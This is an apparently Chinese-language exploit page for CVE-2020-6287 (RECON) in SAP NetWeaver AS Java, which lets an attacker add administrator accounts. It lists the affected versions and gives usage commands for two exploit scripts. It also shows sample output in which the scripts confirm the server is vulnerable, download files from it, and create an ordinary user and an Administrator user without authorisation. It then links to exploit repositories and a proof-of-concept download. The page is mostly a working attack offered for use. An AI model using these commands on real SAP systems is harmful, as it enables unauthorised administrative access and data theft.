# CVE-2020-6287 SAP NetWeaver AS JAVA 任意管理员添加
影响版本:
– 7.30
– 7.31
– 7.40
– 7.50
exp(sap-CVE-2020-6287-add-user.py):
“`
python .\sap-CVE-2020-6287-add-user.py http://vulIP:50000/ test123 test@123123
“`
exp2(RECON.py):
[chipik/SAP_RECON](https://github.com/chipik/SAP_RECON)
Just point SAP NW AS Java hostnmae/ip.
There is additional options:
1. `-c` – check if SAP server is vulnerable to RECON
2. `-f` – download `zip` file from SAP server
3. `-u` – create user SAP JAVA user with `Authenticated User` role
4. `-a` – create user SAP JAVA user with `Administrator` role
Ex.: Download zip file
“`
~python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 – Vulnerable! – http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved
“`
Ex.: Create SAP JAVA user
“`
~python RECON.py -H 172.16.30.8 -u
Check1 – Vulnerable! – http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created
“`
Ex.: Create SAP JAVA Administrator user
“`
~python RECON.py -H 172.16.30.8 -a
Check1 – Vulnerable! [CVE-2020-6287] (RECON) – http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role ‘Administrator’
Ok! Admin user were created
“`
[@duc-nt](https://github.com/duc-nt/CVE-2020-6287-exploit)
[@chipik](https://github.com/chipik/SAP_RECON)
## POC
[点我下载](/Gr33kLibrary/download_tool/120/)
请登录后查看评论内容